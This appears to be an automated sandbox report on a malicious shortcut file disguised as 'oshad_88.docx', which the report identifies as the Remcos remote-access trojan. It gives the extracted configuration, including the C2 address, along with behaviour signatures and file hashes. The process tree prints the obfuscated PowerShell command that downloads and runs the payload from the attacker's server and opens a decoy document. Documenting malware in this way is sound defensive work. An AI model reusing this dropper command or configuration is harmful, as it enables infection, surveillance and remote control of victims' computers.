Overview

overview

10

Static

static

1

brt_1_0147.doc.lnk

windows7-x64

3

brt_1_0147.doc.lnk

windows10-2004-x64

10

oshad_88.docx.lnk

windows7-x64

3

oshad_88.docx.lnk

windows10-2004-x64

10

rv_luti_20...sx.lnk

windows7-x64

3

rv_luti_20...sx.lnk

windows10-2004-x64

10

telegrama_...pg.lnk

windows7-x64

3

telegrama_...pg.lnk

windows10-2004-x64

10

Analysis

  • max time kernel
    147s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27-07-2024 02:06

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    oshad_88.docx.lnk

  • Size

    15KB

  • MD5

    fb1d6a5925aa809496f8d664fb91146d

  • SHA1

    4347f9cb130b55cdf4460ce44b69074ead405f44

  • SHA256

    a115bd24258d2fa68c60a051026c9736e99d6bca72ca33c74b92e2965efbb71a

  • SHA512

    47812284789b246182ff7f7f96715f8c11c1a91d3bfbc8827d6047dced86017a162fbcb2e427cba44a70b71a68c24801da62d590f42601c5339f7b09b3003a1a

  • SSDEEP

    48:81O8xwO/fbjapvpVxCcTjRSbGdCZZGXu/dZZZg:81O8KaapvpVxCYnur

Score
10/10
remcoshumadiscoveryrat

Malware Config

Extracted

Family

remcos

Botnet

huma

C2

81.19.139.74:4343

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-OMQQOG

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 14 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\oshad_88.docx.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2384
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win 1 echo khCwCEDIKlKjzgPuqjEzFKgshYvDYgQwVYamePpFKvcStoqfHEQQywGogK; echo ssVXVsXrMDBsSKAxrwJQXAtV; echo QvLyDcwTwtLsQVOTFtbdIgwUnUPbXJLFTiRpgv; if (-not(Test-Path 'pgg.zip' -PathType Leaf)){&(G''et-C''om''ma''nd in???e-webr**) -uri h''t''tp:''//''8''1.''19''.13''9.7''4/fhtp934657hgjdkldjnblcvpgg.zip -OutFile pgg.zip}; echo dxhXyTUtwdVvacciSBmwIScyKXtlJNXAgzRIvyCyPieWU; Expand-Archive -Path pgg.zip -DestinationPath SecurityCheck; s''tar''t SecurityCheck/ScreenShot.exe; echo FeFuhdkVqwtovfYWaSNzVwpzATjjDvSiOXskaCVkCojJFaDwgLpWZBEJF; &(Ge''t-Com''ma''nd in???e-webre***) -uri h''t''tp:''//''8''1.''19''.13''9.7''4/fhtp934657hgjdkldjnblcvracs/oshad_88.docx -OutFile oshad_88.docx; echo HfGmqstScgHpHUmLivaqWlGIpKAtxTbuGTcfklyA; s''t''a''rt oshad_88.docx
      2⤵
      • Blocklisted process makes network request
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2032
      • C:\Users\Admin\AppData\Roaming\SecurityCheck\ScreenShot.exe
        "C:\Users\Admin\AppData\Roaming\SecurityCheck\ScreenShot.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:3380
        • C:\Users\Admin\AppData\Roaming\bj_service_testv4\ScreenShot.exe
          C:\Users\Admin\AppData\Roaming\bj_service_testv4\ScreenShot.exe
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:1648
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\SysWOW64\cmd.exe
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of WriteProcessMemory
            PID:1680
            • C:\Windows\SysWOW64\explorer.exe
              C:\Windows\SysWOW64\explorer.exe
              6⤵
              • System Location Discovery: System Language Discovery
              PID:4548
      • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
        "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Roaming\oshad_88.docx" /o ""
        3⤵
        • Checks processor information in registry
        • Enumerates system info in registry
        • Suspicious behavior: AddClipboardFormatListener
        • Suspicious use of SetWindowsHookEx
        PID:2020

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\753b75e3
    Filesize

    1.2MB

    MD5

    a4711e8950e249d8b510cb6abbf6f1b2

    SHA1

    5e607a496b190b36d9d283eb0355cb920cb25794

    SHA256

    a9eaa3df73d9666be14d5cdd5ec31550c0fd066466960c2c15a2d96e91c87845

    SHA512

    4a89000f8c973995ae9a8ef521fe444028984ae53c2aeebaa9949764204f9a82d4c0621358eba8c9d2d734d1bf8f4068e4cab27b96ad5b09e0f1a60cfba59aba

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\TCD59B7.tmp\gb.xsl
    Filesize

    262KB

    MD5

    51d32ee5bc7ab811041f799652d26e04

    SHA1

    412193006aa3ef19e0a57e16acf86b830993024a

    SHA256

    6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97

    SHA512

    5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kinypm54.1md.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
    Filesize

    350B

    MD5

    68801276f2f082cafecafe1e3bdfa18f

    SHA1

    995ba70e21c47c482261189d0db168085ba0756f

    SHA256

    c662becc6957fee8448582214c8b4fd309a491ffcb0002a481832f875a159e48

    SHA512

    b9a434c4d49af313a7aaadf304c24ef8769157a630db73f2408958bfe8e15044e4ae714d03dc969aaa00debd634b820ada515c76b3c30cba6316a0d8025639e5

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
    Filesize

    1KB

    MD5

    67bbe6231dc73cd4f9a3c670716f60cc

    SHA1

    3cb1b02162e2a9459012e8859854cd1d6f23e53d

    SHA256

    f74f146ff294208fb903dd21737f253f62cb2c11d70f13396c722c2928162b7c

    SHA512

    9ff1f5860c8167ee9d1786257c4cd79957e443d3e5e6e6cec59ae5002e617ea0bc0466d583cb92c745b6a2e5119570ad375fd4313cf99ba9f5b20213a78a5535

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
    Filesize

    2KB

    MD5

    e58a5f9a776ed7027d621b638757d2c0

    SHA1

    48bc556bee447f4b2f8af6eeee4b0d8c9d9d39fd

    SHA256

    213271fb9b3734385699f4c854e8af2fb2fe3c748e5ce89df6479d38e7c1f1b3

    SHA512

    67529dbccea227e81f0f5b79624836d1c650504253b135cf7188faa80a8dadde1e0a9d2e57c476d07113f54bcf1b11220b3f75fc9832320f4213980189893920

    Download Submit

  • C:\Users\Admin\AppData\Roaming\SecurityCheck\ScreenShot.exe
    Filesize

    1.3MB

    MD5

    6a2cdd8709524999190f4b43a83108c9

    SHA1

    47b472ca518760552d1e0fa2d2321339dd596471

    SHA256

    bd0f954149173d3f5766eee5bd78d5f27ea1ea69667da7b3970b0e6154afc85f

    SHA512

    3b9a50892b7b18480380f69f0eb185b663e82da16064b60a262e9f3181f23ee8510b338eb28af7b961ab555082ffc494cc4fa950610d1991e6d1fa12ba497299

    Download Submit

  • C:\Users\Admin\AppData\Roaming\SecurityCheck\altorilievo.ppt
    Filesize

    942KB

    MD5

    e540c4fcecd77b819094eee15ced316a

    SHA1

    d45eb272fdf83641c942c0b7c66aa1ae313738a0

    SHA256

    577ddb0c94d3814a044af5a4ff2591f1e59d227ae00b37358427e2de2d80ff3d

    SHA512

    01ae43e96ae17b121f2c44b2c67f8ef66e7e278331d4c27d98206304b3a25d3dc211c3a1e2e2c6de6c342007cb67dcfbd7b6af7eeec5c5af5ad8421472d09c8e

    Download Submit

  • C:\Users\Admin\AppData\Roaming\SecurityCheck\centenary.app
    Filesize

    29KB

    MD5

    ed5672e9357974fe27faa05c97b9c6ce

    SHA1

    f866486cd73b42d4aedddba71f16cad9d4554fcb

    SHA256

    530f8dbee1036b66a3c77512e216ab0f67779a3640daf2864d1fd8bd7e539c30

    SHA512

    246b0e833f6b081d9a839537039c1b3432501c2d42491cd5feb45e1a82c71e55370532d8854700eea3a335728cb5c4a7a396e6896ff896427a8f95befdf68252

    Download Submit

  • C:\Users\Admin\AppData\Roaming\SecurityCheck\madbasic_.bpl
    Filesize

    212KB

    MD5

    a734f2428443030c46db9ce3ab2e68a6

    SHA1

    1bf4d3e9b4bf1d801a348f2e46cc9887bae12998

    SHA256

    038511fc64801be03d8472a2f7a6ba8a27e0398cf876be1427c1463cf9190c80

    SHA512

    d829ea13a0d736bee3a788822f5c04e58deff6175da735c25b8031d19e9c3c6bfa40af6882b6e842ba466ba0a5d51c766310491d73261a842334215edf09b699

    Download Submit

  • C:\Users\Admin\AppData\Roaming\SecurityCheck\maddisAsm_.bpl
    Filesize

    64KB

    MD5

    11efab4068cb4058207959e2638c2c1a

    SHA1

    b1eac0879dcda14bdc0c2efd7f261d7c175208c3

    SHA256

    11e3568f497c40331ee4a9e9973967e61b224e19204e09ed7451da3b74bd2ff5

    SHA512

    ced6167612674232429c25e52ba051994b09fdaeaf3316505904456ef8d7063f2eb03b5a158f0a424f0ecb49673e6a3d6b57d61183c5f8402da3fe53af0bd185

    Download Submit

  • C:\Users\Admin\AppData\Roaming\SecurityCheck\madexcept_.bpl
    Filesize

    438KB

    MD5

    562ec96d0f65b0309ad7508d0e0ced11

    SHA1

    0fe9dda664f4f8d9ae18603c5a25756710032a6f

    SHA256

    fb64a5954b726d2d0f0bc26113a36dc8a86c469af994ceeaf2e2609743a0a557

    SHA512

    876b82534764b2d156ce64d52771d38f245d330957287773f6b2360f48564b8d4a304449fa6f6400052165aaf433a191af2d3b38b194a9b1e892552dc0805fba

    Download Submit

  • C:\Users\Admin\AppData\Roaming\SecurityCheck\rtl120.bpl
    Filesize

    1.1MB

    MD5

    e71e48e31ac728a6de7c020645f0c32f

    SHA1

    7f86eadd1b7a0ab87b7ce7c2029bdef3d6fe1d8d

    SHA256

    40a1d1a2f276738f568700ddccac99cdcd35b973fc8be86ab826c0d1abc9d6ff

    SHA512

    5e41dbe7efac8a042a14c2f976d1afcd45e3f7531fb60daab61ac17ffd339d34e1c6746fce9e4b591b026598a89e38f36c6d24e33e2de0b39d81806259f9be2a

    Download Submit

  • C:\Users\Admin\AppData\Roaming\SecurityCheck\vcl120.bpl
    Filesize

    1.9MB

    MD5

    c8cff500ac30e5ef120ecb00bcdc0ebb

    SHA1

    6dc63844fbc7e9678d8653d715d1f65c8c9f834b

    SHA256

    7867aa9cb994e770c40e5b827d4f689bdc913b3466965b77a2b322d6c526045b

    SHA512

    de393681162c50507f3a54b957c264a25993e28b38ac7f21df9b2ce2eab9177a46e1336a88a5045c75aa66f5e9cf2b5edeef5516225bdd80ed0c01506489e8b0

    Download Submit

  • C:\Users\Admin\AppData\Roaming\SecurityCheck\vclx120.bpl
    Filesize

    223KB

    MD5

    8aaa3926885b3fa7ae0448f5e700cb79

    SHA1

    47bd7d281ddde5ebef8599482212743bf2f7e67b

    SHA256

    47396c301fbe78bfaf9e344936a0f7a4e6d174c096f847e160d822e48012162d

    SHA512

    86d395ca89ec2a988f035ecb32640ddac99247e2568673246388fe310e8c3a44807049e8f3482fae86c453d5e3529a8f2daf8614a1086b6d979e64fd917bbe3a

    Download Submit

  • C:\Users\Admin\AppData\Roaming\oshad_88.docx
    Filesize

    15KB

    MD5

    35a1aa0fc4972286c1db07e513c3abbc

    SHA1

    89f5e48e02a03978cd7931651518472c38a7b272

    SHA256

    be338409f57304177e56712593a9345b54d8361ef1fdc767a2fc683a6508cb4e

    SHA512

    f111c86ea937763d091ed195507ee9b3bc95854e22bf31142a9e96bdeb5c273f91f803ea463f8296d5ce611de3a9d959e993fbc03261022a074a203d14ad29c4

    Download Submit

  • memory/1648-144-0x0000000050120000-0x000000005030D000-memory.dmp

    Filesize

    1.9MB

    Download

  • memory/1648-137-0x0000000074C40000-0x0000000074DBB000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/1648-112-0x00007FFF9EE10000-0x00007FFF9F005000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/1648-140-0x0000000050000000-0x0000000050116000-memory.dmp

    Filesize

    1.1MB

    Download

  • memory/1648-111-0x0000000074C40000-0x0000000074DBB000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/1680-147-0x00007FFF9EE10000-0x00007FFF9F005000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/1680-164-0x0000000074C40000-0x0000000074DBB000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/2020-574-0x00007FFF5EE90000-0x00007FFF5EEA0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2020-113-0x00007FFF5CB40000-0x00007FFF5CB50000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2020-94-0x00007FFF5EE90000-0x00007FFF5EEA0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2020-575-0x00007FFF5EE90000-0x00007FFF5EEA0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2020-83-0x00007FFF5EE90000-0x00007FFF5EEA0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2020-95-0x00007FFF5EE90000-0x00007FFF5EEA0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2020-114-0x00007FFF5CB40000-0x00007FFF5CB50000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2020-103-0x00007FFF5EE90000-0x00007FFF5EEA0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2020-110-0x00007FFF5EE90000-0x00007FFF5EEA0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2020-573-0x00007FFF5EE90000-0x00007FFF5EEA0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2020-576-0x00007FFF5EE90000-0x00007FFF5EEA0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2032-13-0x00007FFF80760000-0x00007FFF81221000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2032-14-0x00007FFF80760000-0x00007FFF81221000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2032-80-0x00007FFF80760000-0x00007FFF81221000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2032-17-0x000002AB559A0000-0x000002AB559B2000-memory.dmp

    Filesize

    72KB

    Download

  • memory/2032-8-0x000002AB554D0000-0x000002AB554F2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/2032-18-0x000002AB55990000-0x000002AB5599A000-memory.dmp

    Filesize

    40KB

    Download

  • memory/2032-2-0x00007FFF80763000-0x00007FFF80765000-memory.dmp

    Filesize

    8KB

    Download

  • memory/2032-16-0x00007FFF80760000-0x00007FFF81221000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3380-88-0x0000000050120000-0x000000005030D000-memory.dmp

    Filesize

    1.9MB

    Download

  • memory/3380-86-0x0000000050000000-0x0000000050116000-memory.dmp

    Filesize

    1.1MB

    Download

  • memory/3380-87-0x0000000057000000-0x000000005703F000-memory.dmp

    Filesize

    252KB

    Download

  • memory/3380-89-0x0000000059800000-0x000000005986E000-memory.dmp

    Filesize

    440KB

    Download

  • memory/3380-91-0x0000000057800000-0x0000000057812000-memory.dmp

    Filesize

    72KB

    Download

  • memory/3380-85-0x0000000000400000-0x000000000058B000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/3380-63-0x0000000074C40000-0x0000000074DBB000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/3380-70-0x00007FFF9EE10000-0x00007FFF9F005000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/3380-92-0x0000000050310000-0x0000000050349000-memory.dmp

    Filesize

    228KB

    Download

  • memory/4548-517-0x00007FFF9EE10000-0x00007FFF9F005000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4548-554-0x0000000000400000-0x0000000000484000-memory.dmp

    Filesize

    528KB

    Download

  • memory/4548-555-0x0000000000400000-0x0000000000484000-memory.dmp

    Filesize

    528KB

    Download

  • memory/4548-553-0x0000000000400000-0x0000000000484000-memory.dmp

    Filesize

    528KB

    Download

  • memory/4548-548-0x0000000000400000-0x0000000000484000-memory.dmp

    Filesize

    528KB

    Download

  • memory/4548-547-0x0000000000400000-0x0000000000484000-memory.dmp

    Filesize

    528KB

    Download

  • memory/4548-545-0x0000000000400000-0x0000000000484000-memory.dmp

    Filesize

    528KB

    Download

  • memory/4548-577-0x0000000000400000-0x0000000000484000-memory.dmp

    Filesize

    528KB

    Download

  • memory/4548-578-0x0000000000400000-0x0000000000484000-memory.dmp

    Filesize

    528KB

    Download

  • memory/4548-579-0x0000000000400000-0x0000000000484000-memory.dmp

    Filesize

    528KB

    Download

  • memory/4548-580-0x0000000000400000-0x0000000000484000-memory.dmp

    Filesize

    528KB

    Download